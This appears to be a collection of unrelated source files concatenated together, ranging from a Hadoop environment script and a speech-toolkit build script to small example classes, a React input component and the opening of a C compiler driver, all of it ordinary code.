# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Set Hadoop-specific environment variables here.
# The only required environment variable is JAVA_HOME. All others are
# optional. When running a distributed configuration it is best to
# set JAVA_HOME in this file, so that it is correctly defined on
# remote nodes.
# The java implementation to use.
export JAVA_HOME=${JAVA_HOME}
#export JAVA_HOME=$(readlink -f /usr/bin/java | sed "s:bin/java::")
# The jsvc implementation to use. Jsvc is required to run secure datanodes.
#export JSVC_HOME=${JSVC_HOME}
export HADOOP_CONF_DIR=${HADOOP_CONF_DIR:-"/etc/hadoop"}
# Extra Java CLASSPATH elements. Automatically insert capacity-scheduler.
for f in $HADOOP_HOME/contrib/capacity-scheduler/*.jar; do
if [ "$HADOOP_CLASSPATH" ]; then
export HADOOP_CLASSPATH=$HADOOP_CLASSPATH:$f
else
export HADOOP_CLASSPATH=$f
fi
done
# The maximum amount of heap to use, in MB. Default is 1000.
#export HADOOP_HEAPSIZE=
#export HADOOP_NAMENODE_INIT_HEAPSIZE=""
# Extra Java runtime options. Empty by default.
export HADOOP_OPTS="$HADOOP_OPTS -Djava.net.preferIPv4Stack=true"
# Command specific options appended to HADOOP_OPTS when specified
export HADOOP_NAMENODE_OPTS="-Dhadoop.security.logger=${HADOOP_SECURITY_LOGGER:-INFO,RFAS} -Dhdfs.audit.logger=${HDFS_AUDIT_LOGGER:-INFO,NullAppender} $HADOOP_NAMENODE_OPTS"
export HADOOP_DATANODE_OPTS="-Dhadoop.security.logger=ERROR,RFAS $HADOOP_DATANODE_OPTS"
export HADOOP_SECONDARYNAMENODE_OPTS="-Dhadoop.security.logger=${HADOOP_SECURITY_LOGGER:-INFO,RFAS} -Dhdfs.audit.logger=${HDFS_AUDIT_LOGGER:-INFO,NullAppender} $HADOOP_SECONDARYNAMENODE_OPTS"
# The following applies to multiple commands (fs, dfs, fsck, distcp etc)
export HADOOP_CLIENT_OPTS="-Xmx512m $HADOOP_CLIENT_OPTS"
#HADOOP_JAVA_PLATFORM_OPTS="-XX:-UsePerfData $HADOOP_JAVA_PLATFORM_OPTS"
# On secure datanodes, user to run the datanode as after dropping privileges
export HADOOP_SECURE_DN_USER=${HADOOP_SECURE_DN_USER}
# Where log files are stored. $HADOOP_HOME/logs by default.
#export HADOOP_LOG_DIR=${HADOOP_LOG_DIR}/$USER
# Where log files are stored in the secure data environment.
export HADOOP_SECURE_DN_LOG_DIR=${HADOOP_LOG_DIR}/${HADOOP_HDFS_USER}
# The directory where pid files are stored. /tmp by default.
# NOTE: this should be set to a directory that can only be written to by
# the user that will run the hadoop daemons. Otherwise there is the
# potential for a symlink attack.
export HADOOP_PID_DIR=${HADOOP_PID_DIR}
export HADOOP_SECURE_DN_PID_DIR=${HADOOP_PID_DIR}
# A string representing this instance of hadoop. $USER by default.
export HADOOP_IDENT_STRING=$USER
|
class Employee:
def __init__(self, name, age, salary):
self.name = name
self.age = age
self.salary = salary
employeeA = Employee('John Doe', 35, 5000)
employeeB = Employee('Jane Smith', 28, 6000) |
/* (C) Copyright <NAME>, 2002.
** Distributed under the Boost Software License, Version 1.0.
** (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
*/
#include <cstdio>
int main(int /* argc */, char ** /* argv */)
{
for (int i = 0; i < 16; ++i)
{
std::printf("%d * 2 = %d\n",i,i*2);
}
return 0;
}
|
#include <stdio.h>
void segregateEvenOdd(int arr[], int size)
{
int left = 0, right = size - 1;
while (left < right)
{
while (arr[left] % 2 == 0 && left < right)
left++;
while (arr[right] % 2 == 1 && left < right)
right--;
if (left < right)
{
arr[left] = arr[left] ^ arr[right];
arr[right] = arr[left] ^ arr[right];
arr[left] = arr[left] ^ arr[right];
left++;
right--;
}
}
}
// Driver program to test above functions
int main()
{
int arr[] = {2, 4, 5, 6, 8, 10};
int n = sizeof(arr) / sizeof(arr[0]);
segregateEvenOdd(arr, n);
printf("Modified array with all even elements first: %d", arr[0]);
for (int i = 1; i < n; i++)
printf(" %d", arr[i]);
return 0;
} |
#!/bin/sh
set -eu
. /etc/os-release
APP=vscode
APP_VERSION="$(dpkg -s code | sed -n 's|^Version: \([^-]\+\).*|\1|p')"
NODE_VERSION="$(node --version | sed -e 's/^v//')"
NPM_VERSION="$(npm info npm version)"
YARN_VERSION="$(yarn -version)"
NODE_V2=$(echo "$NODE_VERSION" | cut -d. -f1-2)
YARN_V2=$(echo "$YARN_VERSION" | cut -d. -f1-2)
NPM_V2=$(echo "$NPM_VERSION" | cut -d. -f1-2)
NPM_V1=$(echo "$NPM_VERSION" | cut -d. -f1)
echo "$APP$APP_VERSION-node$NODE_VERSION-npm$NPM_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-yarn$YARN_V2"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V1"
echo "$APP$APP_VERSION-node$NODE_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-yarn$YARN_V2"
|
#!/usr/bin/env bash
this_dir="$( cd "$( dirname "$0" )" && pwd )"
CPU_ARCH="$(uname --m)"
# -----------------------------------------------------------------------------
# Command-line Arguments
# -----------------------------------------------------------------------------
. "${this_dir}/etc/shflags"
DEFINE_string 'venv' "${this_dir}/.venv" 'Path to create virtual environment'
DEFINE_string 'download-dir' "${this_dir}/download" 'Directory to cache downloaded files'
DEFINE_string 'build-dir' "${this_dir}/build_${CPU_ARCH}" 'Directory to build dependencies in'
DEFINE_boolean 'system' true 'Install system dependencies'
DEFINE_boolean 'flair' false 'Install flair'
DEFINE_boolean 'precise' false 'Install Mycroft Precise'
DEFINE_boolean 'adapt' false 'Install Mycroft Adapt'
DEFINE_boolean 'google' false 'Install Google Text to Speech'
DEFINE_boolean 'kaldi' false 'Install Kaldi'
DEFINE_boolean 'offline' false "Don't download anything"
DEFINE_boolean 'web' true "Build Vue web interface with yarn"
DEFINE_boolean 'sudo' true "Use sudo for apt"
DEFINE_integer 'make-threads' 4 'Number of threads to use with make' 'j'
DEFINE_string 'python' 'python3' 'Path to Python executable'
FLAGS "$@" || exit $?
eval set -- "${FLAGS_ARGV}"
# -----------------------------------------------------------------------------
# Default Settings
# -----------------------------------------------------------------------------
set -e
python="${FLAGS_python}"
venv="${FLAGS_venv}"
download_dir="${FLAGS_download_dir}"
mkdir -p "${download_dir}"
echo "Download directory: ${download_dir}"
build_dir="${FLAGS_build_dir}"
mkdir -p "${build_dir}"
echo "Build directory: ${build_dir}"
if [[ "${FLAGS_system}" -eq "${FLAGS_FALSE}" ]]; then
no_system='true'
fi
if [[ "${FLAGS_flair}" -eq "${FLAGS_FALSE}" ]]; then
no_flair='true'
fi
if [[ "${FLAGS_precise}" -eq "${FLAGS_FALSE}" ]]; then
no_precise='true'
fi
if [[ "${FLAGS_adapt}" -eq "${FLAGS_FALSE}" ]]; then
no_adapt='true'
fi
if [[ "${FLAGS_kaldi}" -eq "${FLAGS_FALSE}" ]]; then
no_kaldi='true'
fi
if [[ "${FLAGS_google}" -eq "${FLAGS_FALSE}" ]]; then
no_google='true'
fi
if [[ "${FLAGS_offline}" -eq "${FLAGS_TRUE}" ]]; then
offline='true'
fi
if [[ "${FLAGS_web}" -eq "${FLAGS_FALSE}" ]]; then
no_web='true'
fi
if [[ "${FLAGS_sudo}" -eq "${FLAGS_TRUE}" ]]; then
function run_sudo {
sudo "$@"
}
else
function run_sudo {
"$@"
}
fi
make_threads="${FLAGS_make_threads}"
# -----------------------------------------------------------------------------
# Create a temporary directory for building stuff
temp_dir="$(mktemp -d)"
function cleanup {
rm -rf "${temp_dir}"
}
trap cleanup EXIT
function maybe_download {
if [[ ! -s "$2" ]]; then
if [[ -n "${offline}" ]]; then
echo "Need to download $1 but offline."
exit 1
fi
mkdir -p "$(dirname "$2")"
curl -sSfL -o "$2" "$1" || { echo "Can't download $1"; exit 1; }
echo "$1 => $2"
fi
}
# -----------------------------------------------------------------------------
echo "Checking required programs"
if [[ -z "${no_web}" ]]; then
if [[ ! -n "$(command -v yarn)" ]]; then
echo "Please install yarn to continue (https://yarnpkg.com)"
exit 1
fi
fi
# -----------------------------------------------------------------------------
if [[ -z "${no_system}" ]]; then
echo "Installing system dependencies"
run_sudo apt-get update
run_sudo apt-get install --no-install-recommends \
python3 python3-pip python3-venv python3-dev \
python \
build-essential autoconf autoconf-archive libtool automake bison \
sox espeak flite swig portaudio19-dev \
libatlas-base-dev \
gfortran \
sphinxbase-utils sphinxtrain pocketsphinx \
jq checkinstall unzip xz-utils \
curl \
lame
fi
# -----------------------------------------------------------------------------
echo "Downloading dependencies"
# Python-Pocketsphinx
pocketsphinx_file="${download_dir}/pocketsphinx-python.tar.gz"
if [[ ! -s "${pocketsphinx_file}" ]]; then
pocketsphinx_url='https://github.com/synesthesiam/pocketsphinx-python/releases/download/v1.0/pocketsphinx-python.tar.gz'
echo "Downloading pocketsphinx (${pocketsphinx_url})"
maybe_download "${pocketsphinx_url}" "${pocketsphinx_file}"
fi
# OpenFST
openfst_dir="${build_dir}/openfst-1.6.9"
if [[ ! -d "${openfst_dir}/build" ]]; then
openfst_file="${download_dir}/openfst-1.6.9.tar.gz"
if [[ ! -s "${openfst_file}" ]]; then
openfst_url='http://openfst.org/twiki/pub/FST/FstDownload/openfst-1.6.9.tar.gz'
echo "Downloading openfst (${openfst_url})"
maybe_download "${openfst_url}" "${openfst_file}"
fi
fi
# Opengrm
opengrm_dir="${build_dir}/opengrm-ngram-1.3.4"
if [[ ! -d "${opengrm_dir}/build" ]]; then
opengrm_file="${download_dir}/opengrm-ngram-1.3.4.tar.gz"
if [[ ! -s "${opengrm_file}" ]]; then
opengrm_url='http://www.opengrm.org/twiki/pub/GRM/NGramDownload/opengrm-ngram-1.3.4.tar.gz'
echo "Downloading opengrm (${opengrm_url})"
maybe_download "${opengrm_url}" "${opengrm_file}"
fi
fi
# Phonetisaurus
phonetisaurus_dir="${build_dir}/phonetisaurus"
if [[ ! -d "${phonetisaurus_dir}/build" ]]; then
phonetisaurus_file="${download_dir}/phonetisaurus-2019.tar.gz"
if [[ ! -s "${phonetisaurus_file}" ]]; then
phonetisaurus_url='https://github.com/synesthesiam/docker-phonetisaurus/raw/master/download/phonetisaurus-2019.tar.gz'
echo "Downloading phonetisaurus (${phonetisaurus_url})"
maybe_download "${phonetisaurus_url}" "${phonetisaurus_file}"
fi
fi
# Kaldi
kaldi_dir="${this_dir}/opt/kaldi"
if [[ -z "${no_kaldi}" && ! -d "${kaldi_dir}" ]]; then
install libatlas-base-dev libatlas3-base gfortran
run_sudo ldconfig
kaldi_file="${download_dir}/kaldi-2019.tar.gz"
if [[ ! -s "${kaldi_file}" ]]; then
kaldi_url='https://github.com/kaldi-asr/kaldi/archive/master.tar.gz'
echo "Downloading kaldi (${kaldi_url})"
maybe_download "${kaldi_url}" "${kaldi_file}"
fi
fi
# -----------------------------------------------------------------------------
# Re-create virtual environment
echo "Creating virtual environment"
rm -rf "${venv}"
"${python}" -m venv "${venv}"
source "${venv}/bin/activate"
pip3 install wheel setuptools
# -----------------------------------------------------------------------------
# openfst
# http://www.openfst.org
#
# Required to build languag models and do intent recognition.
# -----------------------------------------------------------------------------
if [[ ! -d "${openfst_dir}/build" ]]; then
echo "Building openfst (${openfst_file})"
tar -C "${build_dir}" -xf "${openfst_file}" && \
cd "${openfst_dir}" && \
./configure "--prefix=${openfst_dir}/build" \
--enable-far \
--disable-static \
--enable-shared \
--enable-ngram-fsts && \
make -j "${make_threads}" && \
make install
fi
# Copy build artifacts into virtual environment
cp -R "${openfst_dir}"/build/include/* "${venv}/include/"
cp -R "${openfst_dir}"/build/lib/*.so* "${venv}/lib/"
cp -R "${openfst_dir}"/build/bin/* "${venv}/bin/"
# -----------------------------------------------------------------------------
# opengrm
# http://www.opengrm.org/twiki/bin/view/GRM/NGramLibrary
#
# Required to build language models.
# -----------------------------------------------------------------------------
# opengrm
if [[ ! -d "${opengrm_dir}/build" ]]; then
echo "Building opengrm (${opengrm_file})"
export CXXFLAGS="-I${venv}/include"
export LDFLAGS="-L${venv}/lib"
tar -C "${build_dir}" -xf "${opengrm_file}" && \
cd "${opengrm_dir}" && \
./configure "--prefix=${opengrm_dir}/build" && \
make -j "${make_threads}" && \
make install
fi
# Copy build artifacts into virtual environment
cp -R "${opengrm_dir}"/build/bin/* "${venv}/bin/"
cp -R "${opengrm_dir}"/build/include/* "${venv}/include/"
cp -R "${opengrm_dir}"/build/lib/*.so* "${venv}/lib/"
# -----------------------------------------------------------------------------
# phonetisaurus
# https://github.com/AdolfVonKleist/Phonetisaurus
#
# Required to guess word pronunciations.
# -----------------------------------------------------------------------------
if [[ ! -d "${phonetisaurus_dir}/build" ]]; then
echo "Installing phonetisaurus (${phonetisaurus_file})"
tar -C "${build_dir}" -xf "${phonetisaurus_file}" && \
cd "${phonetisaurus_dir}" && \
./configure "--prefix=${phonetisaurus_dir}/build" \
--with-openfst-includes="${venv}/include" \
--with-openfst-libs="${venv}/lib" && \
make -j "${make_threads}" && \
make install
fi
# Copy build artifacts into virtual environment
cp -R "${phonetisaurus_dir}"/build/bin/* "${venv}/bin/"
# -----------------------------------------------------------------------------
# kaldi
# https://kaldi-asr.org
#
# Required for speech recognition with Kaldi-based profiles.
# -----------------------------------------------------------------------------
if [[ -z "${no_kaldi}" && ! -f "${kaldi_dir}/src/online2bin/online2-wav-nnet3-latgen-faster" ]]; then
echo "Installing kaldi (${kaldi_file})"
# armhf
if [[ -f '/usr/lib/arm-linux-gnueabihf/libatlas.so' ]]; then
# Kaldi install doesn't check here, despite in being in ldconfig
export ATLASLIBDIR='/usr/lib/arm-linux-gnueabihf'
fi
# aarch64
if [[ -f '/usr/lib/aarch64-linux-gnu/libatlas.so' ]]; then
# Kaldi install doesn't check here, despite in being in ldconfig
export ATLASLIBDIR='/usr/lib/aarch64-linux-gnu'
fi
tar -C "${build_dir}" -xf "${kaldi_file}" && \
cp "${this_dir}/etc/linux_atlas_aarch64.mk" "${kaldi_dir}/src/makefiles/" && \
cd "${kaldi_dir}/tools" && \
make -j "${make_threads}" && \
cd "${kaldi_dir}/src" && \
./configure --shared --mathlib=ATLAS --use-cuda=no && \
make depend -j "${make_threads}" && \
make -j "${make_threads}"
fi
# -----------------------------------------------------------------------------
# Python requirements
# -----------------------------------------------------------------------------
echo "Installing Python requirements"
"${python}" -m pip install requests
# pytorch is not available on ARM
case "${CPU_ARCH}" in
armv7l|arm64v8)
no_flair="true" ;;
esac
requirements_file="${temp_dir}/requirements.txt"
temp_requirements_file="${temp_dir}/temp_requirements.txt"
cp "${this_dir}/requirements.txt" "${requirements_file}"
# Exclude requirements
if [[ -n "${no_flair}" ]]; then
echo "Excluding flair from virtual environment"
sed '/^flair/d' "${requirements_file}" > "${temp_requirements_file}" &&
mv "${temp_requirements_file}" "${requirements_file}"
fi
if [[ -n "${no_precise}" ]]; then
echo "Excluding Mycroft Precise from virtual environment"
sed '/^precise-runner/d' "${requirements_file}" > "${temp_requirements_file}" &&
mv "${temp_requirements_file}" "${requirements_file}"
fi
if [[ -n "${no_adapt}" ]]; then
echo "Excluding Mycroft Adapt from virtual environment"
sed '/^adapt-parser/d' "${requirements_file}" > "${temp_requirements_file}" &&
mv "${temp_requirements_file}" "${requirements_file}"
fi
if [[ -n "${no_google}" ]]; then
echo "Excluding Google Text to Speech from virtual environment"
sed '/^google-cloud-texttospeech/d' "${requirements_file}" > "${temp_requirements_file}" &&
mv "${temp_requirements_file}" "${requirements_file}"
fi
# Install everything except openfst first
sed '/^openfst/d' "${requirements_file}" > "${temp_requirements_file}" &&
mv "${temp_requirements_file}" "${requirements_file}"
"${python}" -m pip install -r "${requirements_file}"
echo "Installing Python openfst wrapper"
"${python}" -m pip install \
--global-option=build_ext \
--global-option="-I${venv}/include" \
--global-option="-L${venv}/lib" \
-r <(grep '^openfst' "${this_dir}/requirements.txt")
# -----------------------------------------------------------------------------
# Pocketsphinx for Python
# https://github.com/cmusphinx/pocketsphinx
#
# Speech to text for most profiles.
# -----------------------------------------------------------------------------
pocketsphinx_file="${download_dir}/pocketsphinx-python.tar.gz"
echo "Installing Python pocketsphinx (${pocketsphinx_file})"
"${python}" -m pip install "${pocketsphinx_file}"
# -----------------------------------------------------------------------------
# Snowboy
# https://snowboy.kitt.ai
#
# Wake word system
# -----------------------------------------------------------------------------
case "${CPU_ARCH}" in
x86_64|armv7l)
snowboy_file="${download_dir}/snowboy-1.3.0.tar.gz"
echo "Installing snowboy (${snowboy_file})"
"${python}" -m pip install "${snowboy_file}"
;;
*)
echo "Not installing snowboy (${CPU_ARCH} not supported)"
esac
# -----------------------------------------------------------------------------
if [[ -z "${no_web}" ]]; then
echo "Building web interface"
cd "${this_dir}" && yarn install && yarn build
fi
|
<reponame>vadi2/codeql
public class A {
Object customStep(Object o) { return null; }
Object source() { return null; }
void sink(Object o) { }
Object through1(Object o) {
Object o2 = customStep(o);
String s = (String)o2;
return s;
}
void foo() {
Object x = through1(source());
sink(x);
}
}
|
#!/bin/bash
# Delete old dummy app
rm -rf spec/dummy
# Generate new dummy app
DISABLE_MIGRATE=true bundle exec rake dummy:app
if [ ! -d "spec/dummy/config" ]; then exit 1; fi
# Cleanup
rm spec/dummy/.ruby-version
rm spec/dummy/Gemfile
cd spec/dummy
# Use correct Gemfile
sed -i "s|../Gemfile|../../../Gemfile|g" config/boot.rb
# I18n configuration
touch config/initializers/i18n.rb
echo "Rails.application.config.i18n.available_locales = [:en, :de]" >> config/initializers/i18n.rb
echo "Rails.application.config.i18n.default_locale = :de" >> config/initializers/i18n.rb
# I18n routing
touch config/initializers/route_translator.rb
echo "RouteTranslator.config do |config|" >> config/initializers/route_translator.rb
echo " config.force_locale = true" >> config/initializers/route_translator.rb
echo "end" >> config/initializers/route_translator.rb
# Turbolinks
sed -i "15irequire 'turbolinks'" config/application.rb
# Satisfy prerequisites
sed -i "15irequire 'cmor_cms'" config/application.rb
rails generate simple_form:install --bootstrap
rails generate administrador:install
rails generate cmor:core:install
rails generate cmor:core:backend:install
rails generate cmor:cms:install
rails cmor_cms:install:migrations
# Install gem
rails generate cmor:legal:install
# prepare spec database
rails db:migrate db:test:prepare
|
<filename>app/models/Destination.java
package models;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
@Entity
public class Destination
{
@Id @GeneratedValue(strategy = GenerationType.IDENTITY) private int destinationId;
private String destinationName;
private String destinationInformation;
public int getDestinationId()
{
return destinationId;
}
public String getDestinationName()
{
return destinationName;
}
public String getDestinationInformation()
{
return destinationInformation;
}
public void setDestinationId(int destinationId)
{
this.destinationId = destinationId;
}
public void setDestinationName(String destinationName)
{
this.destinationName = destinationName;
}
public void setDestinationInformation(String destinationInformation)
{
this.destinationInformation = destinationInformation;
}
}
|
class ShowDetails {
var contextType: String
var downTime: String
var playTime: Int
var title: String
var upTime: String
var isShow: Bool
init(contextType: String, downTime: String, playTime: Int, title: String, upTime: String, isShow: Bool) {
self.contextType = contextType
self.downTime = downTime
self.playTime = playTime
self.title = title
self.upTime = upTime
self.isShow = isShow
}
func startShow() {
isShow = true
}
func endShow() {
isShow = false
}
func displayDetails() {
print("Title: \(title)")
print("Context Type: \(contextType)")
print("Downtime: \(downTime)")
print("Uptime: \(upTime)")
print("Playtime: \(playTime) minutes")
print("Currently Showing: \(isShow ? "Yes" : "No")")
}
}
// Example usage
let show = ShowDetails(contextType: "Drama", downTime: "8:00 PM", playTime: 60, title: "The Crown", upTime: "9:00 PM", isShow: false)
show.displayDetails()
show.startShow()
show.displayDetails()
show.endShow()
show.displayDetails() |
import { css } from '@emotion/css'
import * as React from 'react'
const style = css`
position: relative;
.input__field {
font-size: var(--font-size-xsmall);
font-weight: var(--font-weight-normal);
letter-spacing: var( --font-letter-spacing-neg-xsmall);
line-height: var(--line-height);
position: relative;
display: flex;
overflow: visible;
align-items: center;
width: 100%;
height: 30px;
margin: 1px 0 1px 0;
padding: var(--size-xxsmall) var(--size-xxxsmall) var(--size-xxsmall) var(--size-xxsmall);
color: var(--black8);
border: 1px solid transparent;
border-radius: var(--border-radius-small);
outline: none;
background-color: var(--white);
&:hover, &:placeholder-shown:hover {
color: var(--black8);
border: 1px solid var(--black1);
background-image: none;
}
&::placeholder {
color: var(--black6);
border: 1px solid transparent;
}
&:placeholder-shown {
border: 1px solid var(--black1);
}
&:focus:placeholder-shown {
border: 1px solid var(--blue);
outline: 1px solid var(--blue);
outline-offset: -2px;
}
&:disabled:hover {
border: 1px solid transparent;
}
&:active, &:focus {
color: var(--black);
border: 1px solid var(--blue);
outline: 1px solid var(--blue);
outline-offset: -2px;
}
&:disabled {
position: relative;
color: var(--black6);
user-select: none;
}
&:disabled:active {
outline: none;
}
&:invalid {
border: 1px solid var(--red);
outline: 1px solid var(--red);
outline-offset: -2px;
}
}
.input--borders {
border: 1px solid var(--black1);
}
`
type props = {
type: 'text' | 'password' | 'number';
className?: string;
placeholder: string;
defaultValue?: any;
value?: any;
isDisabled?: boolean;
required?: boolean;
pattern?: string;
onChange?: (
value: string,
event: React.ChangeEvent<HTMLInputElement>
) => void;
}
export const Input = ({
className = '',
defaultValue,
type,
value,
placeholder,
isDisabled,
onChange,
required,
pattern
}: props) => {
return (
<div className={`${style} input ${className || ''}`}>
<input
type={type}
className={`input__field ${className || ''}`}
placeholder={placeholder}
defaultValue={defaultValue}
value={value}
disabled={isDisabled}
required={required}
pattern={pattern}
onChange={(event) => onChange && onChange(event.target.value, event)}
/>
</div>
)
}
|
#ifndef SENDMESSAGEWIDGET_H
#define SENDMESSAGEWIDGET_H
#include "base/titletableviewwidget.h"
#include "send/txmessagetablemodel.h"
#include "send/checkedbuttondelegate.h"
#include <dbc4cpp/parser.h>
#include <QPushButton>
#include <QList>
#include <QComboBox>
#include <QLineEdit>
#include <QSortFilterProxyModel>
#define SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED 1
class SendMessageWidget : public TitleTableViewWidget
{
Q_OBJECT
public:
explicit SendMessageWidget(QWidget *parent = nullptr);
~SendMessageWidget();
void resetSizePolicy();
public slots:
void resetContent(Document *doc, QList<Message*> msgList);
void sendButtonClicked(int row, int col);
void currentChanged(const QModelIndex ¤t, const QModelIndex &previous);
void updateMessageData(Message *msg);
void onToggleAllCyclicButton(bool checked);
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
void filterTextChanged(QString text);
void filterColumnChanged(int index);
#endif
signals:
void refreshCurrMessage(Message *msg, CAN_OBJ *obj);
protected:
void initTitle();
void initModel();
void initTableView();
void initCan();
void initToolButtons();
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
void initFilter(QHBoxLayout *toolButtonsLayout);
#endif
private:
void enableSendMessage(int msgId, bool enabled);
int maxWidth = -1;
protected:
TxMessageTableModel *model = nullptr;
QPushButton *enableAllCyclicButton;
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
QComboBox *filterColumnCombo = nullptr;
QLineEdit *filterTextEdit = nullptr;
QSortFilterProxyModel *proxyModel = nullptr;
#endif
CheckedButtonDelegate *checkedItemDelegate;
QPushButton *resizeColumnsButton;
};
#endif // SENDMESSAGEWIDGET_H
|
def duplicate_remover(array)
seen = {}
array.each do |e|
seen[e] = true
end
seen.keys
end |
<reponame>GeorgeMe/java-design-patterns<filename>producer-consumer/src/main/java/com/iluwatar/producer/consumer/Producer.java
package com.iluwatar.producer.consumer;
import java.util.Random;
/**
* Class responsible for producing unit of work that can be expressed as {@link Item} and submitted
* to queue
*/
public class Producer {
private final ItemQueue queue;
private final String name;
private int itemId = 0;
public Producer(String name, ItemQueue queue) {
this.name = name;
this.queue = queue;
}
public void produce() throws InterruptedException {
Item item = new Item(name, itemId++);
queue.put(item);
Random random = new Random();
Thread.sleep(random.nextInt(2000));
}
}
|
<gh_stars>10-100
package io.dronefleet.mavlink.ardupilotmega;
import io.dronefleet.mavlink.annotations.MavlinkEntryInfo;
import io.dronefleet.mavlink.annotations.MavlinkEnum;
/**
*
*/
@MavlinkEnum
public enum GoproRequestStatus {
/**
* The write message with ID indicated succeeded.
*/
@MavlinkEntryInfo(0)
GOPRO_REQUEST_SUCCESS,
/**
* The write message with ID indicated failed.
*/
@MavlinkEntryInfo(1)
GOPRO_REQUEST_FAILED
}
|
#!/bin/bash
for i in {1..40}
do
echo ""
done
cargo run config.json
|
#!/bin/bash
../run_inference.py 1ctfA.a3m 1ctfA.pkl
|
<reponame>stardot/ncc
/*
* driver.c - driver for Codemist compiler (RISC OS, DOS, Mac/MPW, Unix)
* Copyright (C) Acorn Computers Ltd., 1988-1990.
* Copyright (C) Codemist Ltd., 1988-1992.
* Copyright (C) Advanced RISC Machines Limited, 1990-1992.
* SPDX-Licence-Identifier: Apache-2.0
*/
/*
* RCS $Revision$ Codemist 186
* Checkin $Date$
* Revising $Author$
*/
/* AM memo: we should look at a getenv() variable to find alternative */
/* path names to /usr/include etc: This would greatly facilitate */
/* installing as an alternative C compiler and reduce the shambles */
/* (which is being tidied) in env = 2; below. */
/* AM notes that DEC's version of MIPS C compiler uses env variables */
/* COMP_HOST_ROOT and COMP_TARGET_ROOT for this. */
/* AM, Jul 89: COMPILING and TARGET flag tests have been reviewed. */
/* The effect is than running a RISCOS compiler on UNIX looks like a */
/* unix compiler (i.e. -S not -s) except for target-specific flags. */
/* Beware the TARGET_IS_HELIOS flags as not rationalised. */
/* AM: This file should more properly be called unixdriv.c: the */
/* rationale is that it munges the command line and repeatedly calls */
/* the compiler and possibly the linker just like the unix 'cc' cmd. */
/* It is target-independent, but rather host dependent. Accordingly */
/* it needs not to be used on machines like the ibm370 under MVS etc., */
/* where the file munging done is totally inappropriate. */
/* We need a HOST_ or COMPILING_ON_ test whether to include this file. */
/* Further, we would like to suppress the LINK option unless the */
/* host and target are have compatible object format. */
/* Host dependencies:
1. use of getenv("c$libroot").
2. file name munging.
3. The HELP text in drivhelp.h
More?
*/
#include <stddef.h>
#ifdef __STDC__
# include <stdlib.h>
# include <string.h>
#else
# include <strings.h>
extern void exit();
extern char *getenv();
extern int system();
#endif
#include <ctype.h>
#include <stdio.h>
#define uint HIDE_HPs_uint
#include <signal.h>
#undef uint
#include <setjmp.h>
#include "globals.h"
#include "errors.h"
#include "compiler.h"
#include "store.h"
#include "fname.h"
#include "version.h"
#include "drivhelp.h"
#include "mcdep.h"
#include "prgname.h"
#include "pp.h"
#ifdef FOR_ACORN
#include "dde.h"
#endif
#include "toolenv2.h"
#include "tooledit.h"
#include "toolbox.h"
#include "toolver.h"
#include "trackfil.h"
BackChatHandler backchat;
static jmp_buf exitbuf;
/*************************************************************/
/* */
/* Set up default compilation options (Arthur,Msdos,Unix) */
/* */
/*************************************************************/
/* The meaning of the bits in the user's number n in '-On' */
#define MINO_CSE 0x1
#define MINO_NAO 0x2
#define MINO_MAX 0x3 /* sum of above */
#define SMALL_COMMAND 128
#define INCLUDE_BUFLEN 64 /* initial size of include buffer */
#define MAX_TEXT 256 /* The longest filename I can handle */
/* #define BSD_CC "/usr/ucb/cc" */
#define KEY_NEXT 1L
#define KEY_HOST_LIB 0x0000002L
#define KEY_HELP 0x0000004L
#define KEY_LINK 0x0000008L
#define KEY_LISTING 0x0000010L
#define KEY_PCC 0x0000020L
#define KEY_CONFIG 0x0000040L
#define KEY_COMMENT 0x0000080L
#define KEY_ASM_OUT 0x0000100L
#define KEY_XPROFILE 0x0000200L
#define KEY_MAKEFILE 0x0000400L
#define KEY_PREPROCESS 0x0000800L
#define KEY_PROFILE 0x0001000L
#define KEY_RENAME 0x0002000L
#define KEY_MD 0x0008000L
#define KEY_READONLY 0x0010000L
#define KEY_STDIN 0x0020000L
#define KEY_COUNTS 0x0040000L
#ifdef RISCiX113 /* LDS 31-July-92 @@@ */
# define KEY_RIX120 0x0080000L /* Sad history; retire soon? */
# define KEY_NOSYSINCLUDES 0x0000000L /* Avoid spurious #ifdef RISCiX113 */
#else
# define KEY_NOSYSINCLUDES 0x0080000L
#endif
#define KEY_ERRORSTREAM 0x00400000L
#define KEY_VIAFILE 0x00800000L
#define KEY_VERIFY 0x01000000L
# define KEY_CFRONT 0x02000000L
#define KEY_DEBUG 0x08000000L
#ifndef FORTRAN
/* IDJ 25-Mar-94: re-use FORTRAN flags for DDE purposes */
#define KEY_THROWBACK 0x10000000L
#define KEY_DESKTOP 0x20000000L
#define KEY_DEPEND 0x40000000L
#define KEY_CFRONTPREPROCESS 0x80000000L
#else
#define KEY_F66 0x10000000L
#define KEY_ONETRIP 0x20000000L
#define KEY_UPPER 0x40000000L
#define KEY_LONGLINES 0x80000000L
/* The following are duplicated from ffe/feint.h. This is a temporary bodge. */
#define EXT_DOUBLECOMPLEX 1L
#define EXT_HINTEGER 2L
#define EXT_CASEFOLD 4L
#define EXT_LCKEYWORDS 8L
#define EXT_LCIDS 0x10L
#define EXT_FREEFORMAT 0x20L
#define EXT_IMPUNDEFINED 0x40L
#define EXT_RECURSION 0x80L
#define EXT_AUTO 0x100L
#define EXT_HOLLERITH 0x200L
#define EXT_TOPEXPRESS 0x400L
#define EXT_F66 0x800L
#define EXT_MIXEDCOMM 0x1000L
#define EXT_VMSCHARS 0x2000L
#define EXT_VMSCASTS 0x4000L
#define EXT_VMSIO 0x8000L
